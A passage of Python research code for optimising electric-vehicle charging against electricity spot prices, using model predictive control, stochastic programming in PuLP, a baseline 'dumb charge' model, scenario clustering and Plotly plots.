cat='Continuous')\n s = LpVariable.dicts(\"s\", tvec, lowBound=0, upBound=0.25*bmax, cat='Continuous') # Add penalizing slack for violating bmax=80%, but still remain below 100%\n s2 = {i: LpVariable(\"s2_\"+str(i), lowBound=0, upBound=ub) for i, ub in enumerate(bmin)}\n b[0] = b0; #s2[0] = 0;\n\n # Objective\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * ((b[T+1])-b[0]) + [c_tilde*100*s[t] + c_tilde*100*s2[t+1] for t in tvec])\n\n # Constraints\n for t in tvec:\n prob += b[t+1] == b[t] + x[t]*r - u_forecast[t]\n prob += b[t+1] >= bmin[t+1] - s2[t+1] # Punishment slack variable for violating bmin at t+1\n prob += b[t+1] <= bmax + s[t] # Punishment slack variable for violating bmax at t\n prob += x[t] <= xmax * z[t]\n prob += x[t] >= 0\n\n # Solve problem\n if verbose:\n prob.solve(PULP_CBC_CMD(msg=1)) \n else:\n prob.solve(PULP_CBC_CMD(msg=0))\n\n # Update b1 with actual use (relative to what we chose to charge)\n b[1] = b[0] + x[0]*r - u_t_true\n prob.assignVarsVals({'b_1': b[1]})\n\n # Return results\n return(prob, x, b)\n\n\ndef plot_EMPC(prob, name=\"\", x=np.nan, b=np.nan, u=np.nan, c=np.nan, z=np.nan, starttime='', endtime='', export=False, export_only = False, BatteryCap=60, firsthour=0, vehicle_id='', SOCorg=None):\n fig = go.Figure()\n if type(prob) == dict:\n tvec = np.arange(0, len(prob['x']))\n tvec_b = np.arange(0, len(prob['b']))\n fig.add_trace(go.Scatter(x=tvec_b, y=[value(prob['b'][t]) for t in tvec_b], mode='lines', name='State-of-Charge'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(prob['u'][t]) for t in tvec], mode='lines', name='Use'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(prob['x'][t]) for t in tvec], mode='lines', name='Charging'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(prob['c'][t]) for t in tvec], mode='lines', name='True Price'))\n fig.add_trace(go.Scatter(x=tvec, y=[prob['z'][t]*2-1 for t in tvec], mode='lines', name='Plugged-in', line=dict(color='black', width=0.5)))\n obj = prob['objective']\n if SOCorg is not None:\n fig.add_trace(go.Scatter(x=tvec_b, y=[SOCorg[t] for t in tvec_b], mode='lines', name='Original SOC'))\n BatteryCap = max(BatteryCap, np.max(SOCorg), np.max([value(prob['b'][t]) for t in tvec_b]))\n \n else:\n tvec = np.arange(0, len(x))\n tvec_b = np.arange(0, len(b))\n obj = value(prob.objective)\n fig.add_trace(go.Scatter(x=tvec_b, y=[value(b[t]) for t in tvec_b], mode='lines', name='State-of-Charge'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(u[t]) for t in tvec], mode='lines', name='Use'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(x[t]) for t in tvec], mode='lines', name='Charging'))\n fig.add_trace(go.Scatter(x=tvec, y=[value(c[t]) for t in tvec], mode='lines', name='True Price'))\n fig.add_trace(go.Scatter(x=tvec, y=[z[t]*2-1 for t in tvec], mode='lines', name='Plugged-in', line=dict(color='black', width=0.5)))\n \n fig.update_xaxes(tickvals=tvec_b[::24]+firsthour, ticktext=[str(t//24) for t in tvec_b[::24]+firsthour])\n\n fig.update_yaxes(range=[-3, BatteryCap+2])\n\n fig.update_layout(title=name + \" from \" + starttime +\" to \"+ endtime+\" Total raw cost: \" + str(round(obj)) + \" DKK\",\n xaxis_title=\"Days\",\n yaxis_title=\"kWh or DKK/kWh or [T/F]\")\n if not export_only:\n fig.show()\n\n ## Export figure\n if export:\n if vehicle_id != '':\n # Make vehicle_unique folder\n vehicle_id = str(vehicle_id) + \"/\"\n if not os.path.exists(\"plots/MPC/\"+vehicle_id):\n os.makedirs(\"plots/MPC/\"+vehicle_id)\n if not os.path.exists(\"plots/MPC/\"+vehicle_id + \"pdfs/\"):\n os.makedirs(\"plots/MPC/\"+vehicle_id + \"pdfs/\")\n fig.write_html(\"plots/MPC/\"+vehicle_id + name + \"_mpc.html\")\n layout = dict(font=dict(family='Computer Modern',size=9),\n margin=dict(l=5, r=5, t=30, b=5),\n width=605, height= 250,\n title_x = 0.5,\n legend=dict(orientation=\"h\", yanchor=\"bottom\", y=-.30, xanchor=\"right\", x=1))\n # Move xaxis title to the bottom left\n fig.update_xaxes(title_text=\"Days .\")\n fig.update_layout(layout)\n # Decrease linewidth of all lines except for \"Plugged-in\"\n for i in range(len(fig.data)-1):\n fig.data[i].line.width = 1.5\n fig.write_image(\"plots/MPC/\"+vehicle_id + \"pdfs/\" + name + \"_mpc.pdf\")\n\ndef DumbCharge(b0, bmax, bmin, xmax, c, c_tilde, u, z, T, tvec, r=1, verbose=False):\n # Init problem\n prob = LpProblem(\"mpc_DumbCharge\", LpMinimize)\n\n # Init variables\n x = LpVariable.dicts(\"x\", tvec, lowBound=0, upBound=xmax, cat='Continuous')\n b = LpVariable.dicts(\"b\", np.append(tvec,T+1), lowBound=0, upBound=5000, cat='Continuous')\n i = LpVariable.dicts(\"i\", tvec, lowBound=0, upBound=1, cat='Binary')\n s = LpVariable.dicts(\"s\", tvec, lowBound=0, upBound=0.25*bmax, cat='Continuous')\n #s2 = LpVariable.dicts(\"s2\", tvec, lowBound=0, upBound=bmin, cat='Continuous')\n s2 = {i: LpVariable(\"s2_\"+str(i), lowBound=0, upBound=ub, cat='Continuous') for i, ub in enumerate(bmin)}\n b[0] = b0\n M = 10**6\n\n # Objective\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]) + [100*c_tilde*(s[t]+s2[t+1]) for t in tvec])\n\n # Constraints\n for t in tvec:\n prob += b[t+1] == b[t] + x[t]*r - u[t]\n prob += b[t+1] >= bmin[t+1] - s2[t+1]\n prob += b[t+1] <= bmax + s[t]\n \n ######## DUMB CHARGE ########\n ########## Implement in OR-terms: x[t] == min(z[t]*xmax, bmax-b[t]) ==> min(z[t]*xmax, bmax+s[t]-b[t]-u[t] / r)\n # Ensure i[t] == 1, if z[t]*xmax < bmax-b[t] (dvs. i=1 når der er rigeligt plads på batteriet)\n prob += (bmax+s[t]-b[t])/r - z[t]*xmax - M*i[t] <= 0 # Sry, men tilføj evt. u[t], fordi der i analysen bliver forbrugt strøm mens vi oplader. I praksis ville denne være 0 (eller næsten 0) og kan slettes fra modellen. Hvorfor er det ikke snyd at have den med: I Dumbcharge vil vi alligevel oplade med max hastighed indtil den er fuld, så hvis der lineært blet forbrugt strøm over den time, er det effektivt det samme at kende u[t] i den time.\n prob += z[t]*xmax - (bmax+s[t]-b[t])/r - M*(1-i[t]) <= 0\n\n # Use i[t] to constraint x[t]\n prob += x[t] <= z[t]*xmax\n prob += x[t] <= (bmax+s[t]-b[t]) / r # s[t] er tilføjet for at undgå, at x[t] tvinges negativ, når b[t] er en smule højere end bmax\n prob += x[t] >= (z[t]*xmax - M*(1-i[t])) # i = 1 betyder, at der lades max kapacitet\n prob += x[t] >= (bmax+s[t]-b[t]) / r - M*i[t] # i = 0 betyder, at vi kun kan lade de resterende til 80 eller 100 % SOC\n #prob += i[t] <= z[t]\n\n # Solve problem\n prob.solve(PULP_CBC_CMD(gapAbs = 0.01, msg=verbose))\n\n # Return objective without penalization\n prob += lpSum([c[t]*x[t] for t in tvec] - c_tilde * (b[T+1]-b[0]))\n\n # Return results\n return(prob, x, b)\n\n### Stochastic programming functions. Maintained in here\ndef StochasticProgram(n_scenarios, b0, bmax, bmin, xmax, c_d, c_s, c_tilde, u_t_true, u_forecast, z, tvec, r, l, previous_solution=None, KMweights=None, verbose=True):\n \"\"\"\n Solves the 2-stage stochastic program for a given time horizon T, and returns the optimal solution.\n l: Length of deterministic prices\n O: Number of scenarios (Omega)\n \"\"\"\n\n if KMweights is None:\n KMweights = np.repeat(1/n_scenarios, n_scenarios)\n O, K = c_s.shape\n tvec_d = tvec[0:l] # Deterministic part\n tvec_s = tvec[l:] # Stochastic part\n \n ### Init problem\n prob = LpProblem(\"StochEcoMPC\", LpMinimize)\n\n ### Init variables\n x_d = LpVariable.dicts(\"x_d\", tvec_d, lowBound=0, upBound=xmax, cat='Continuous')\n x_s = LpVariable.dicts(\"x_s\", [(t,o) for o in range(O) for t in tvec_s], lowBound=0, upBound=xmax, cat='Continuous') #xs_i,omega\n b = LpVariable.dicts(\"b\", [(t,o) for o in range(O) for t in np.append(tvec,tvec[-1]+1)], lowBound=0, upBound=5000, cat='Continuous')\n s = LpVariable.dicts(\"s\", [(t,o) for o in range(O) for t in tvec], lowBound=0, upBound=0.25*bmax, cat='Continuous') # Add penalizing slack for violating bmax=80%, but still remain below 100%\n s2 = {(i, o): LpVariable(\"s2_(\"+str(i)+\",_\"+str(o)+\")\", lowBound=0, upBound=ub) for o in range(O) for i, ub in enumerate(bmin)}\n # Set initial SOC to b0 for all scenarios o\n for o in range(O): b[(0,o)] = b0\n\n # # warm-start\n # if (previous_solution is not None) and (l > 1):\n # x_d_prev = previous_solution[0]\n # x_s_prev = previous_solution[1]\n # for t in range(1, len(x_d_prev)):\n # if t < l:\n # x_d[t-1].setInitialValue(round(x_d_prev[t].value(),5))\n # for t in range(l+1, l+int(len(x_s_prev)/O)):\n # if t <= h:\n # for o in range(O):\n # x_s[t-1,o].setInitialValue(round(x_s_prev[(t,o)].value(), 5))\n\n ### Objective\n prob += lpSum([c_d[t]*x_d[t] for t in tvec_d]) + lpSum([KMweights[o] * c_s[o,t]*x_s[t,o] for t in tvec_s for o in range(O)]) - lpSum([KMweights[o] * c_tilde * ((b[tvec[-1],o]) - b[0,o]) for o in range(O)]) + lpSum([KMweights[o] * 100 *c_tilde*(s[t,o]+s2[t+1,o]) for t in tvec for o in range(O)])\n\n ### Constraints\n # Deterministic part\n for t in tvec_d:\n for o in range(O):\n prob += b[(t+1,o)] == b[(t,o)] + x_d[t]*r - u_forecast[t]\n prob += b[(t+1,o)] >= bmin[t+1] - s2[t+1,o]\n prob += b[(t+1,o)] <= bmax + s[t,o]\n prob += x_d[t] <= xmax * z[t]\n prob += x_d[t] >= 0\n\n # Stochastic part$\n for t in tvec_s:\n for o in range(O):\n prob += b[(t+1,o)] == b[(t,o)] + x_s[(t,o)]*r - u_forecast[t]\n prob += b[(t+1,o)] >= bmin[t+1] - s2[t+1,o]\n prob += b[(t+1,o)] <= bmax + s[t,o]\n prob += x_s[(t,o)] <= xmax * z[t]\n prob += x_s[(t,o)] >= 0\n\n # Solve problem\n if verbose:\n prob.solve(PULP_CBC_CMD(warmStart=(previous_solution != None)))\n else:\n prob.solve(PULP_CBC_CMD(msg=0, warmStart= (previous_solution != None)))\n print(\"Status:\", LpStatus[prob.status])\n\n # Update b1 with actual use (relative to what we chose to charge) (Should be sufficient only to update b(1,0))\n for o in range(O):\n b[(1,o)] = b[(0,o)] + value(x_d[0])*r - u_t_true\n prob.assignVarsVals({'b_(1,_'+str(o)+')': b[1,o]})\n assert b[1,o] == value(b[1,0]), \"b(1,o) is not equal to value(b(1,0))\"\n \n # Return results\n return(prob, x_d, b, x_s)\n\ndef getMediods(scenarios, n_clusters):\n # Perform KMedoids clustering\n kmedoids = KMedoids(n_clusters=n_clusters, random_state=0).fit(scenarios)\n # Extract mediods\n mediods = scenarios[kmedoids.medoid_indices_]\n # Extract proportion of scenarios in each cluster\n cluster_proportions = np.zeros(n_clusters)\n for i in range(n_clusters):\n cluster_proportions[i] = np.mean(kmedoids.labels_ == i)\n # Return mediods and cluster proportions\n return(mediods, cluster_proportions)\n\n# Maintained here\ndef MultiDayStochastic(scenarios, n_scenarios, dfp, dft, dfspot, u, uhat, z, h, b0, bmax, bmin, xmax, c_tilde, r, KMweights=None, maxh=6*24, perfectForesightUse=False, verbose=False):\n # Study from first hour of prediciton up to and including the latest hour of known spot price\n L = len(u) - (maxh+1)\n H = h; # Store h\n\n # Init\n flag_AllFeasible = True\n prev_sol = None\n tvec = np.arange(0,h+1)\n B = np.empty((L+1)); B[:] = np.nan; B[0] = b0;\n X = np.empty((L)); X[:] = np.nan\n c = dfspot['TruePrice'].to_numpy()\n costs = 0\n k = 0\n # E.g. k, i, j, l, b0 = 163, 163, 0, 17, 60.17055119267742\n \n # For each Atime\n for i in range(len(dfp)):\n h = H\n l = dfp['l_hours_avail'][i]+1\n # For each hour until next forecast\n for j in range(dfp['Atime_diff'][i]):\n flag_OutOfForecasts = False\n if k%50 == 0:\n print(\"k = \" + str(k) + \" of \" + str(L-1))\n \n # Patch holes in forecasts (1 out of 2)\n l = l-1\n if l < 12: # New prices are known at 13.00\n l = 35\n\n # When re-using the same forecast, shorten the horizon\n if j>0:\n h = max(h-1, l-1) # h = h-1 but don't go below the DayAhead horizon\n h = min(h, L-k) # Allow control to know that experiment is ending.\n tvec = np.arange(0,h+1)\n #print(\"i,j,k,l,h = \", i,j,k,l,h)\n\n # Extract forecasts from t=0..h\n c_forecast = dfp.iloc[i, (j+3):(3+H+1)].to_numpy();\n \n # Patch holes in forecasts (2 out of 2) - use known prices\n #c_forecast[:min(l,h+1)] = dft.iloc[i, (j+3):(3+H+1)].to_numpy()[:min(l,h+1)]\n try:\n c_forecast[:min(l,h+1)] = c[k:k+min(l,h+1)]\n except:\n # Edge case: If c_forecast has become shorter than known hours: fix\n if min(l,h+1) > len(c_forecast):\n c_forecast = c[k:k+min(l,h+1)]\n flag_OutOfForecasts = True\n print(\"flag: Out Of Forecasts\")\n \n # Extract deterministic and stochastic prices\n if KMweights is None:\n idx = np.random.randint(0, scenarios.shape[0]-n_scenarios)\n scenarioExtract = scenarios[idx:idx+n_scenarios, :] # Subset new scenarios every iteration\n else:\n scenarioExtract = scenarios\n \n # Extract prices\n c_d = c_forecast[:l] # Deterministic part\n #print(\"k = \" + str(k) + \" of \" + str(L-1) + \" i = \"+str(i),\" - l = \" + str(l) + \" - h = \" + str(h) + \" - j = \" + str(j) + \" - c_d = \" + str(c_d) + \" - c_forecast = \" + str(c_forecast))\n if not flag_OutOfForecasts:\n c_s = c_forecast + scenarioExtract[:, j:(H+1)] # Stochastic part\n else:\n c_s = c_forecast + np.zeros((n_scenarios, len(c_forecast)))\n c_s[c_s < 0] = 0 # Truncate cost_stochastic to assume non-negative electricity spot prices. Conclussion: Performed better.\n\n # Find relevant input at the specific hours of flexibility\n tvec_i = np.arange(k, k+h+1)\n z_i = z[tvec_i]\n bmin_i = bmin[np.append(tvec_i, tvec_i[-1]+1)]\n\n u_forecast = np.repeat(uhat[k], h+1)\n if perfectForesightUse:\n u_forecast = u[tvec_i]\n u_t_true = u[k]\n\n # Solve\n if z_i[0] != 0: # Plugged in\n prob, x_d, b, x_s = StochasticProgram(n_scenarios, b0, bmax, bmin_i, xmax, c_d, c_s, c_tilde, u_t_true, u_forecast, z_i, tvec, r, l, previous_solution=None, KMweights=KMweights, verbose=verbose)\n if LpStatus[prob.status] != 'Optimal':\n flag_AllFeasible = False\n print(\"\\n\\nPlugged in = \", z[k],\"=\", z_i[0])\n print(\"bmin = \", round(bmin[k]), round(bmin_i[0]), \"bmin_t+1 = \", round(bmin_i[1]))\n print(\"u_true, u_forecast = \", u[k], u_forecast[0])\n print(\"b0 = \", b0, \"b1 = \", value(b[1,0]))\n print(\"x = \", value(x_d[0]), \"Trying \", bmin[k+1],\"<=\", r*value(x_d[0])+b[0,0]-u[k], \" <= \", bmax)\n print(\"Infeasible at k = \" + str(k) + \" with i = \" + str(i) + \" and j = \" + str(j), \" and l = \" + str(l))\n print(\"\\n\\n\\n\")\n x0 = value(x_d[0])\n b1 = value(b[1,0])\n elif z_i[0] == 0: # Not plugged in\n x0 = 0\n b1 = b0 + x0*r - u_t_true\n\n # Implement/store only the first step, and re-run in next hour\n X[k]=x0; # Amount charged in the now-hour\n B[k+1]=b1; # Battery level after the now-hsecour / beggining of next hour\n costs += x0 * c[k]; # Cost of charging in the now-hour\n b0 = b1 # Next SOC start is the current SOC\n k += 1\n #prev_sol = [x_d, x_s] # For warm-start\n\n # THE END\n if k == L:\n # Costs\n total_cost = np.sum(costs) - c_tilde * (B[-1] - B[0])\n\n # Any non-feasibilities\n if any(B<0) or any(B > 1.25*bmax):\n flag_AllFeasible = False\n\n # Tie results intro prob\n prob = {'x':X, 'b':B, 'u':u[0:L], 'c':c[0:L], 'z':z[0:L], 'objective':total_cost}\n return(prob, X, B, flag_AllFeasible)\n\n# Maintained here (from mpc3_montadata.py)\ndef MultiDay(dfp, dft, dfspot, u, uhat, z, h, b0, bmax, bmin, xmax, c_tilde, r, DayAhead=False, maxh=6*24, perfectForesightUse=False):\n # Study from first hour of prediciton up to and including the latest hour of known spot price\n L = len(u) - (maxh+1) # Run through all data, but we don't have forecasts of use/plug-in yet.\n # maxh = maximum h of interest ==> to allow comparison on exact same data for different horizons h.\n H = h # store h\n # Init\n flag_AllFeasible = True\n tvec = np.arange(0,h+1)\n B = np.empty((L+1)); B[:] = np.nan; B[0] = b0;\n X = np.empty((L)); X[:] = np.nan\n c = dfspot['TruePrice'].to_numpy()\n costs = 0\n k = 0\n\n # For each Atime\n for i in range(len(dfp)):\n h = H\n tvec = np.arange(0,h+1)\n flagForecastHole = 0\n l = dfp['l_hours_avail'][i]+1\n # For each hour until next forecast\n for j in range(dfp['Atime_diff'][i]):\n if k%50 == 0:\n print(\"k = \" + str(k) + \" of \" + str(L-1))\n \n # Patch holes in forecasts (1 out of 2)\n l = l-1\n if l < 12: # New prices are known at 13.00\n l = 35\n flagForecastHole += 1\n\n if DayAhead: # If Day-Ahead Smart Charge, disregard h input and use h = l_hours_avail-1\n h = l-1\n #H = dfp['l_hours_avail'][i]-1\n H = dfp['l_hours_avail'][i]-1 + 24*flagForecastHole\n #print(\"i,j,k,l,h = \", i,j,k,l,h)\n\n # When re-using the same forecast, shorten the horizon\n if (j>0) and (not DayAhead):\n h = max(h-1, l-1) # h = h-1 but don't go below the DayAhead horizon\n h = min(h, L-k) # Allow control to know that experiment is ending.\n tvec = np.arange(0,h+1)\n\n # Extract forecasts from t=0..h\n #c_forecast = dfp.iloc[i, (j+3):(j+3+h+1)].to_numpy()\n c_forecast = dfp.iloc[i, (j+3):(3+H+1)].to_numpy()\n \n # Patch holes in forecasts (2 out of 2) - use known prices\n #c_forecast[:min(l,h+1)] = dft.iloc[i, (j+3):(3+H+1)].to_numpy()[:min(l,h+1)]\n #print(\"k = \" + str(k) + \" of \" + str(L-1) + \" (h = \" + str(h) + \") i=\" + str(i) + \" j=\" + str(j) + \" l=\" + str(l) + \" c_forecast = \" + str(c_forecast))\n try:\n c_forecast[:min(l,h+1)] = c[k:k+min(l,h+1)]\n except:\n # Edge case: If c_forecast has become shorter than known hours: fix\n if min(l,h+1) > len(c_forecast):\n c_forecast = c[k:k+min(l,h+1)]\n\n \n # Find relevant input at the specific hours of flexibility\n tvec_i = np.arange(k, k+h+1)\n z_i = z[tvec_i] # Assuming known plug-in times.\n bmin_i = bmin[np.append(tvec_i, tvec_i[-1]+1)]\n\n u_forecast = np.repeat(uhat[k], h+1) # = actually uhat[k-1], but a 0 has been appended as first value.\n if perfectForesightUse:\n u_forecast = u[tvec_i]\n u_t_true = u[k]\n \n # Solve\n if z_i[0] != 0:\n prob, x, b = ImperfectForesight(b0, bmax, bmin_i, xmax, c_forecast, c_tilde, u_t_true, u_forecast, z_i, h, tvec, r, verbose=False) # Yes, it is tvec=0..h, NOT tvec_i\n #print(\"Status:\", LpStatus[prob.status])\n if LpStatus[prob.status] != 'Optimal':\n flag_AllFeasible = False\n print(\"\\n\\nPlugged in = \", z[k],\"=\", z_i[0])\n print(\"bmin = \", round(bmin[k]), round(bmin_i[0]), \"bmin_t+1 = \", round(bmin_i[1]))\n print(\"u = \", u[k], u_forecast[0])\n print(\"b0 = \", b0, \"b1 = \", value(b[1]))\n print(\"x = \", value(x[0]), \"Trying \", bmin[k+1],\"<=\", r*value(x[0])+b0-u[k], \" <= \", bmax)\n print(\"Infeasible at k = \" + str(k) + \" with i = \" + str(i) + \" and j = \" + str(j))\n print(\"\\n\\n\\n\")\n x0 = value(x[0])\n b1 = value(b[1])\n elif z_i[0] == 0: # Not plugged in\n x0 = 0\n b1 = b0 + x0*r - u_t_true\n\n # Implement/store only the first step, and re-run in next hour\n X[k]=x0; # Amount charged in the now-hour\n B[k+1]=b1; # Battery level after the now-hour / beggining of next hour\n costs += x0 * c[k]; # Cost of charging in the now-hour\n #print(c[k+0], dft.iloc[i,j+3+0], c_forecast[0+0], dfp.iloc[i,j+3+0], j, l)\n b0 = b1 # Next SOC start is the current SOC\n k += 1\n \n # THE END\n if k == L:\n # Costs\n total_cost = np.sum(costs) - c_tilde * (B[-1] - B[0])\n \n # Any non-feasibilities\n if any(B<0) or any(B > 1.25*bmax):\n flag_AllFeasible = False\n\n # Tie results intro prob\n prob = {'x':X, 'b':B, 'u':u[0:L], 'c':c[0:L], 'z':z[0:L], 'objective':total_cost}\n return(prob, X, B, flag_AllFeasible)\n\n# Maitained here\ndef ExtractEVdataForMPC(dfv, z_var, u_var, uhat_var, bmin_var, p, data=''):\n # Read the dfp and dft and dfspot --- This section can be moved out of the function to save a slgiht bit of time\n dfp = pd.read_csv(f'data/MPC-ready/df_{data[:5]}predprices_for_mpc.csv', sep=',', header=0, parse_dates=True)\n dft = pd.read_csv(f'data/MPC-ready/df_{data[:5]}trueprices_for_mpc.csv', sep=',', header=0, parse_dates=True)\n dfspot = pd.read_csv(f'data/spotprice/df_{data[:5]}spot_commontime.csv', sep=',', header=0, parse_dates=True)\n\n dft['Atime'] = pd.to_datetime(dft['Atime'], format='%Y-%m-%d %H:%M:%S')\n dfp['Atime'] = pd.to_datetime(dfp['Atime'], format='%Y-%m-%d %H:%M:%S')\n dfspot['Time'] = pd.to_datetime(dfspot['Time'], format='%Y-%m-%d %H:%M:%S')\n\n # Convert timezone from UTC to Europe/Copenhagen\n dfspot['Time'] = dfspot['Time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n dfp['Atime'] = dfp['Atime'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n dft['Atime'] = dft['Atime'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n\n ####################### Load each element in the list into a dataframe ############################\n starttime = max(dfspot['Time'][0], dfp['Atime'][0], dfv.index[0])\n endtime = min(dfspot['Time'].iloc[-1], dfp['Atime'].iloc[-1], dfv.index[-1])\n\n # Cut dfs to be withing starttime and endtime\n dfspot = dfspot[(dfspot['Time'] >= starttime) & (dfspot['Time'] <= endtime)].reset_index(drop=True)\n #dfp = dfp[(dfp['Atime'] >= starttime) & (dfp['Atime'] <= endtime)].reset_index(drop=True) # The forecast history is the bottleneck\n #dft = dft[(dft['Atime'] >= starttime) & (dft['Atime'] <= endtime)].reset_index(drop=True)\n dfv = dfv[(dfv.index >= starttime) & (dfv.index <= endtime)]\n timestamps = dfv.index\n firsthour = dfv.index[0].hour\n dfp = dfp[(dfp['Atime'] >= timestamps[0]) & (dfp['Atime'] <= timestamps[-1])].reset_index(drop=True) # The forecast history is the bottleneck\n dft = dft[(dft['Atime'] >= timestamps[0]) & (dft['Atime'] <= timestamps[-1])].reset_index(drop=True)\n dfv = dfv.reset_index(drop=False)\n\n ## Print occurences of number of hours between forecasts\n #dfp.Atime_diff.value_counts() # Up to 66 hours between forecasts\n\n ############################################ EXTRACT EV USAGE DATA ####################################################\n # Use\n vehicle_id = dfv['vehicle_id'].unique()[0]\n z = ((dfv[z_var] == 1)*1).to_numpy()\n u = dfv[u_var].to_numpy()\n uhat = dfv[uhat_var].to_numpy()\n uhat = np.append(0, uhat) # For first iter, uhat = 0 => uhat[k] = RollingMean(use)_{i = k-(10*24)...k-1}\n b0 = dfv['SOC'][0]\n r = dfv['efficiency_median'].unique()[0]\n #print(np.sum(u), \"==\", np.sum(dfv['use']))\n # Input\n bmin = dfv[bmin_var].to_numpy()\n # Vehicle parameters\n #bmax = dfv['SOCmax'].median()\n bmax = 0.8*dfv['BatteryCapacity'].median()\n #bmax = np.nanmin([dfv['SOCmax'], dfv['BatteryCapacity']], axis=0)\n xmax = dfv['CableCapacity'].unique()[0]\n c_tilde = np.quantile(dfspot['TruePrice'], p) #min(c[-0:24]) # Value of remaining electricity: lowest el price the past 24h\n\n return dfv, dfspot, dfp, dft, timestamps, z, u, uhat, b0, r, bmin, bmax, xmax, c_tilde, vehicle_id, firsthour, starttime, endtime\n\n# Maintained in dataviz_cardata2.py\ndef PlotChargingProfile(D2=None, dfvehicle=None, var=\"VEHICLE_ID\", id=13267, plot_efficiency_and_SOCmin=True, vertical_hover=False, df_only=False, layout=None, imgtitle=\"PlainProfile_id\"):\n \"\"\"\n Plot the charging profile of a single vehicle\n If df_only is True, then only the dataframe is returned\n If df_vehicle is not None, then only plotting is done\n \"\"\"\n\n if dfvehicle is None:\n D2v = D2[D2[var] == id]\n D2v = D2v.sort_values(by=['CABLE_PLUGGED_IN_AT'])\n id = int(id)\n\n firsttime = D2v['CABLE_PLUGGED_IN_AT'].min().date() - datetime.timedelta(days=1)\n lasttime = max( D2v['PLANNED_PICKUP_AT'].max().date(), D2v['RELEASED_AT'].max().date()) + datetime.timedelta(days=1)\n\n assert len(D2v.capacity_kwh.unique()) == 1, \"Battery capacity changes for vehicle \" + str(id)\n assert len(D2v.max_kw_ac.unique()) == 1, \"Cable capacity changes for vehicle \" + str(id)\n\n # Create a list of times from firsttime to lasttime\n times = pd.date_range(firsttime, lasttime, freq='1h')\n # Create a list of zeros\n zeros = np.zeros(len(times))\n nans = np.full(len(times), np.nan)\n # Create a dataframe with these times and zeros\n df = pd.DataFrame({'time': times, 'z_plan': zeros, 'z_act': zeros, 'charge': zeros, 'price': nans, 'SOC': nans, 'SOCmin': nans, 'SOCmax': nans, 'BatteryCapacity': nans, 'CableCapacity': nans, 'efficiency': nans})\n df['time'] = df['time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n df.z_plan, df.z_act = -1, -1\n # Set the index to be the time\n df = df.set_index('time')\n \n # Vehicle specifics\n df['BatteryCapacity'] = D2v.iloc[-1]['capacity_kwh']\n df['CableCapacity'] = D2v.iloc[-1]['max_kw_ac']\n\n # Loop over all plug-ins and plug-outs # ADD KWH AND SOC RELATIVE TO TIMES\n for i in range(len(D2v)):\n # Set z=1 for all times from plug-in to plug-out\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['PLANNED_PICKUP_AT'], 'z_plan'] = 1 #i=2, ser ud til at være fucked, når CABLE_PLUGGED_IN_AT IKKE er heltal.\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['RELEASED_AT'], 'z_act'] = 1\n\n # Allow semi-discrete plug-in relative to proportion of the hour\n #df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT'], 'z_plan'] = 1\n\n # Extract charge from 'KWHS' and add to df where time is the same\n xt = pd.DataFrame(eval(D2v.iloc[i]['KWHS']))\n if D2v.iloc[i]['KWH'] != round(xt.sum()[1],4):\n print(\"KWH total and sum(kWh_t) does not match for D2v row i=\", i)\n xt['time'] = pd.to_datetime(xt['time'])\n xt['time'] = xt['time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n xt = xt.set_index('time')\n df.loc[xt.index, 'charge'] = xt['value']\n\n # Efficiency of charging (ratio of what has been charged to what goes into the battery)\n #if D2v.iloc[i]['KWH'] >= 1: # Only proper charging\n if D2v.iloc[i]['KWH'] > 0:\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['RELEASED_AT'], 'efficiency'] = ((D2v.iloc[i].SOC - D2v.iloc[i].SOC_START) / 100 * D2v.iloc[i]['capacity_kwh']) / D2v.iloc[i].KWH\n\n # Add the right spot prices to df\n if type(D2v.iloc[i]['SPOT_PRICES']) == str and len(eval(D2v.iloc[i]['SPOT_PRICES'])) != 0:\n prices = pd.DataFrame(eval(D2v.iloc[i]['SPOT_PRICES']))\n prices['time'] = pd.to_datetime(prices['time'])\n prices['time'] = prices['time'].dt.tz_localize('UTC').dt.tz_convert('Europe/Copenhagen')\n prices = prices.set_index('time')\n df.loc[prices.index, 'price'] = prices['value']\n \n # Add SOC and convert to kWhs\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT'].ceil('H', ambiguous=bool), 'SOC'] = D2v.iloc[i]['SOC_START']/100 * D2v.iloc[i]['capacity_kwh']\n df.loc[D2v.iloc[i]['PLANNED_PICKUP_AT'].floor('H'), 'SOC'] = D2v.iloc[i]['SOC']/100 * D2v.iloc[i]['capacity_kwh']\n\n # Add SOCmax\n df.loc[D2v.iloc[i]['CABLE_PLUGGED_IN_AT']:D2v.iloc[i]['PLANNED_PICKUP_AT'], 'SOCmax'] = D2v.iloc[i]['SOC_LIMIT']/100 * D2v.iloc[i]['capacity_kwh']\n\n # bmin (PURELY INPUT ASSUMPTION)\n min_charged = 0.40 # 40% of battery capacity\n min_alltime = 0.05 # Never go below 5%\n df.loc[D2v.iloc[i]['PLANNED_PICKUP_AT'].floor('H'), 'SOCmin'] = min_charged * df['BatteryCapacity'][i] # Min SOC\n df['SOCmin'] = df['SOCmin'].fillna(min_alltime * df['BatteryCapacity'][i])\n\n\n # If z_plan_everynight and corresponding bmin\n # z_plan_everynight:\n df['z_plan_everynight'] = -1 # df['z_plan_everynight'] = df['z_plan']\n df.loc[(df.index.hour >= 22) | (df.index.hour < 6), 'z_plan_everynight'] = 1\n\n # bmin_everymorning:\n df['SOCmin_everymorning'] = min_alltime * df['BatteryCapacity'] #df['SOCmin_everymorning'] = df['SOCmin']\n df.loc[(df.index.hour == 6), 'SOCmin_everymorning'] = min_charged * df['BatteryCapacity']\n\n # Costs\n df['costs'] = df['price'] * df['charge']\n df = df.merge(df_spot, 